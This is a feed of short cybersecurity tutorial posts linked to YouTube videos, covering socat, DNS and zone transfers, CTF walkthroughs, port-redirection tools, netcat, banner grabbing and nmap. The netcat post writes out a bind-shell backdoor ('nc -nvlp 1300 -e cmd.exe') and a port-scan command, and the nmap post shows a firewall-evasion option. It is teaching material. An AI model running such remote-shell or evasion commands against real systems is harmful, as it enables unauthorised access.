nileshpnj
nileshpnj
Nilesh Jadav
60 posts
Don't wanna be here? Send us removal request.
nileshpnj · 4 years ago
Video
youtube
Socat - Socket CAT | Fundamentals of Cybersecurity
SOCAT (Socket CAT)
It is a networking tool that is used for transferring data between two location. Location could be socket or port such as TCP, UDP, Ipv4 and so on. Utility for data transfer between two address. 
 Syntax - 
#socat [option] <address ><address>  
In one machine, command prompt, 
 # socat - TCP4-LISTEN:4444  -- you will get "hello" message here
 In another machine, command prompt, 
 # socat - TCP4:192.168.117.130:4444 -- you can send the message "hello" 
#sockets #port #socat #SOCAT #portforwarding #portredirection #ethicalhacking #cybersecurity #offensivesecurity
0 notes
nileshpnj · 4 years ago
Video
youtube
How DNS (Domain Name System) Works | What is DNS ?
#DNS #Domain #DomainNameSystem #Cybersecurity #EthicalHacking #ComputerNetwork #IPAddress #DomainName #Zone #ZoneTransfer #DNSZoneTransfer 
What is DNS (Domain Name System ) Part 1 -  https://youtu.be/JiEqDAdWqm4 What is DNS (Domain Name System ) Part 2 - https://youtu.be/drnL7KTRG0w What is DNS Zone Transfer - https://youtu.be/JRMQlbZvi1o 
In this video, we will discuss about how DNS (Domain Name System) works. 
 1) A request (www.google.com)  from client from his browser, goes to the OS host file, if the request resource is there ( domain to IP mapping), then it will fetch the result and show it to you. 
 2) If not, then it goes to the ISP cache, if the mapping is there in the cache, it will fetch the result and show it to you. 
 3) Otherwise, it forwards to the Root Server, Root server will ask TLD server (Top Level Domain Server) {.com, org, edu..} 
 4) The TLD ( in our case, it is .com) will ask Name server for the mapping, the Name server will fetch the (www.google.com) domain to IP (172.168.0.2) to the client. 
 5) In the client browser, can see the google web page. What is DNS? How DNS works?
 Subscribe for more videos : https://www.youtube.com/c/nileshkumarJadav/ 
0 notes
nileshpnj · 5 years ago
Video
youtube
What is DNS Zone Transfer | Fundamentals of Cybersecurity
What is DNS (Domain Name System ) Part 1 -  https://youtu.be/JiEqDAdWqm4
What is DNS (Domain Name System ) Part 2 - https://youtu.be/drnL7KTRG0w
What a server is responsible for or has authority over is called as a zone.
The server makes a database file called zone file, that keeps all information about every node under that zone.
If a server is appointed for a domain, and that domain is not further divided into subdomains, then the domain and zone will be the same, otherwise the domain and server will be different from each other. 
Primary DNS Server(Master): 
A Primary DNS Server is a server holds the Primary Zone file which it has authority. Primary Zone file is a Read-Write copy of DNS Zone file. Resource Records for the Zone are created, updated and maintained, in Primary Zone file.
Secondary DNS Server (Slave):
A Secondary DNS Server is a server that holds the Secondary Zone file, which is a Read-Only copy of the Primary Zone file. It is not possible to create or update Resource Records in a Secondary Zone. The Secondary DNS Server transfers the information about a zone from another DNS Server (Primary or Secondary) via a process called “Zone Transfer”. Any update is required in the Zone, must be done at the Primary DNS Server and then transferred to the Secondary DNS Server.
Importance of Secondary DNS is for load balancing in case of DDOS or in case of any failure to master.
#DNS #Domain #DomainNameSystem #Cybersecurity #EthicalHacking #ComputerNetwork #IPAddress #DomainName #Zone #ZoneTransfer #DNSZoneTransfer
0 notes
nileshpnj · 5 years ago
Video
youtube
What is Domain Name System (DNS) | DNS | How DNS Works ? - Part 2
What is Domain Name System (DNS) - Part 1 - https://youtu.be/JiEqDAdWqm4
In this video, we will discuss about DNS (Domain Name System),  
It  will translate your domain name into IP addresses with the help of Lookup Table - Forward Lookup  (Domain Name into IP Address) and Reverse Lookup - (IP Address to Domain Name).
What is the need of DNS ?
- Humans are not good at remembering numerical data such as IP address.
- In case of, Website web server gets migrated or changed
The idea of name space is based on its IP address, As addresses are unique, it needs name should also be unique.
It can be organized in two ways :
Flat Namespace
Hierarchical Namespace
Flat Namespace : A name in this space is a sequence of characters without  any structure.
The main disadvantage of Flat Namespace is : it cannot used for large system and Internet is very large.
Hierarchical Namespace:  It is made up of several parts and the name have some structure.
The first part can be a nature of organization (.com), the second part can be a name of organization (Marwadi) and the third part can be anything (ftp, department, www).
#infosec #cyberdefense #vulnerability #security #cyber #hacking #cybersecurity #ethicalhacking
0 notes
nileshpnj · 5 years ago
Video
youtube
What is Domain Name System (DNS) | DNS | How DNS Works ? - Part 1
In this video, we will discuss about DNS (Domain Name System),  It  will translate your domain name into IP addresses with the help of Lookup Table - Forward Lookup  (Domain Name into IP Address) and Reverse Lookup - (IP Address to Domain Name).
What is the need of DNS ? - Humans are not good at remembering numerical data such as IP address. - In case of, Website web server gets migrated or changed
What is DNS? How DNS works? What is Domain Name System ? How DNS is important in Cybersecurity?
#DNS #Domain #DomainNameSystem #Cybersecurity #EthicalHacking #ComputerNetwork #IPAddress #DomainName
0 notes
nileshpnj · 5 years ago
Video
youtube
In this video, we have solved level 3 of Mod-X CTF, where a simple jar is there, and a hidden base 64 encoded flag, need to be decoded. Enjoy the walkthrough.
#vulnerabilityassessment #cybersecurity #ethicalhacking #computerscience #hackers #cyberdefense #infosec #modx #ctf #capturetheflag
0 notes
nileshpnj · 5 years ago
Video
youtube
This is my second video where we are playing Mod-X CTF and this is level 2 of the game, where we have a simple cipher to crack. Hope you will enjoy.
#CTF #ctfwalkthrough #hackthebox #modxctf #hacking #ethicalhacking #networksecurity #cyberdefense #vulnerability #penetrationtesting #infosec
0 notes
nileshpnj · 5 years ago
Video
youtube
After a long time, my first CTF walkthrough for Mod-X. Happy Hacking :)
#computerscience #cybersecurity #infosec #hacking #penetrationtesting #hackers #modxctf #ctf #capturetheflag #vulnerabilityassessment #networksecurity #vulnerability #cyberdefense
0 notes
nileshpnj · 5 years ago
Video
Find my first CTF walkthrough for ModX. Happy Hacking :)
#cybersecurity #penetrationtesting #networksecurity #vulnerabilityassessment #ethicalhacking #infosec #vulnerability #cyberdefense #computer #computernetworking #programming #hackers #cyber #computerscience
0 notes
nileshpnj · 5 years ago
Video
youtube
fpipe - Port redirection tool for Windows OS.
-----------------------------------------------------------------------
It supports both TCP and UDP.
# fpipe -l 1028 -r 80 www.google.com
whenever you will put your ip address and port in url bar, it will redirect you to the google.com with port 80.
Subscribe for more videos : https://www.youtube.com/c/nileshkumarJadav/
#datapipe #portredirection #portforwarding #cyberseucrity #ethicalhacking #tcpip #hackers #fpipe #ethicalhacker #ethicalhackingtraining #computerprogramming #infosec #hacking #security #cybersecurity #computerscience #vulnerabilityassessment #cyberdefense
0 notes
nileshpnj · 5 years ago
Video
youtube
Datapipe - TCP/IP socket/port redirection application 
You need to download this tool from the given link - https://github.com/bovine/datapipe
In command prompt
# cd Downloads
# gcc -o datapipe datapipe.c
# ./datapipe your_ip 1026 www.example.ac.in 80.
#./datapipe your_ip 4444 www.facebook.com 443
This datapipe will act as a proxy and will redirect you to example or Facebook website(depend on what website you are providing in the command), with your IP and port.
The disadvantage of this tool is - it only supports the TCP port.
Subscribe for more videos : https://www.youtube.com/c/nileshkumarJadav/
#penetrationtesting #cybersecuritycareers #cybersecurity #computerscience #cyber #ethicalhacking #hacking #networksecurity #computerprogramming #vulnerabilityassessment #hackers
0 notes
nileshpnj · 5 years ago
Video
youtube
Assemblies in .NET
In this video we will understand the assemblies in .NET,  Types of assemblies. Assemblies in .NET are single unit of deployment.
#computerprogramming #dotnetdeveloper #dotnet #csharp
0 notes
nileshpnj · 5 years ago
Video
youtube
Netcat Tutorial | Introduction to Netcat | Fundamentals of Cybersecurity
Netcat (nc) -- Network utility for reading from and writing to network connection using TCP and UDP.
In windows,
nc.exe -nvlp 1100 (-n numeric IP address, -V Verbose, -l Listen, -p Ports)
In Kali,
# nc -nv (target IP) (Port Number)
Then you are connected, send hello message.
It is also used for port scanning, and port listening.
# nc -v -w2 -z (target IP) range of port (1-100)
where, -v verbose, -w2 wait no more then 2 seconds, -z prevent you from sending any TCP data, range of port (any range of port number).
It also transfer file using netcat or as a backdoor into other network.
Windows -- # nc -nvlp 1300 -e cmd.exe
Kali -- # nc -nv 192.168.117.128 1300
Subscribe for more videos : https://www.youtube.com/c/nileshkumarJadav/
#computerscience #computerprogramming #computernetwork #computernetwork #tcp #Netcat #Cybersecurity #Cybersecuritytutorials #NetcatTutorials #EthicalHacking #Hackers #Cyberattack
0 notes
nileshpnj · 5 years ago
Video
youtube
What is Network Traffic Probe ? | Fundamentals of Cybersecurity
In this video we discuss about Network Traffic Probe and how it is important to Cybersecurity.
A probe is an action taken or an object used for the purpose of learning something about the state of the network. Example of Network traffic probe -- Ping Command. It also could be a program or other device inserted at key junction in a network for the purpose of monitoring or collecting data about network activity -- network tap. What is Network Traffic Probe ? What is Traffic Probe ? What is Probe in Cybersecurity ? Subscribe for more videos : https://lnkd.in/eV3JaUA #computerprogramming #computernetwork #tcp #wirelessnetwork #computernetworking #nmap #computerscience #cybersecuritycareers #defcon #Cybersecurity #Cyberdefense #Infosec #Defcon #EthicalHacking #NetworkTrafficProbe #Probe #TrafficProbe #CybersecurityTutorials 
0 notes
nileshpnj · 5 years ago
Video
youtube
6 Most Used Tool for Banner Grabbing | Kali Linux | Fundamentals of Cybersecurity
In this video we will understand how to do banner grabbing and what is the use of Banner Grabbing in Cybersecurity ?
What is Banner ?
What is Banner Grabbing ?
Banner Grabbing in Cybersecurity
What is Information Gathering ?
Banner Grabbing - technique used to gain information about a computer system, on a network and the services on its open ports. Mostly he grab the information from HTTP(80), FTP (21), SMTP (25).
6 Most Tools used for Banner Grabbing -
a) Curl
b) Wget
c) telnet
d) netcat
e) nmap
f) dmitry
Subscribe for more videos : https://www.youtube.com/c/nileshkumarJadav/
#BannerGrabbing #Nmap #Cybersecurity #ComputerScience #Defcon #Hacking #EthicalHacking #PenetrationTesting  #BannerGrabbingTool
0 notes
nileshpnj · 5 years ago
Video
youtube
What is Banner Grabbing ? | Fundamentals of Cybersecurity | Penetration Testing
In this video we will understand how to do banner grabbing and what is the use of Banner Grabbing in Cybersecurity ? Banner Grabbing - technique used to gain information about a computer system, on a network and the services on its open ports. Mostly he grab the information from HTTP(80), FTP (21), SMTP (25). Tools - Netcat, Telnet, Zenmap or Nmap. Subscribe for more videos : https://lnkd.in/eV3JaUA #BannerGrabbing #Nmap #Cybersecurity #ComputerScience #Defcon #Hacking #EthicalHacking #PenetrationTesting #ComputerPgramming #computernetwork #cybersecuritycareers #computerprogramming #hackers #security #infosec
0 notes
nileshpnj · 5 years ago
Video
youtube
Nmap Tutorials | How to use Nmap | Nmap Tutorials | Port Scanning Tutorial
In this video we will understand how we can block nmap traffic coming to our operating system. Using IP tables we can do this by blocking data length of traffic 60 bytes. iptables -I INPUT -p tcp -m length --length 60 -j REJECT --reject-with tcp-reset. To enumerate above traffic we can now use --data-length in our nmap command. We use the command for Nmap scan: # nmap --data-length 12 -p21 target_ip address. This simple scan will give you the result as the port 21 is open, filtered or closed for the service. Subscribe for more videos : https://lnkd.in/eV3JaUA Follow me on Twitter - https://lnkd.in/e__Sphj Connect me with Linkedin - https://lnkd.in/e8tg-an Follow me on Instagram - https://lnkd.in/e-CEcFH Follow my Facebook Page - https://lnkd.in/erR_xwW For more .NET related Projects : https://lnkd.in/fqEwq4i
0 notes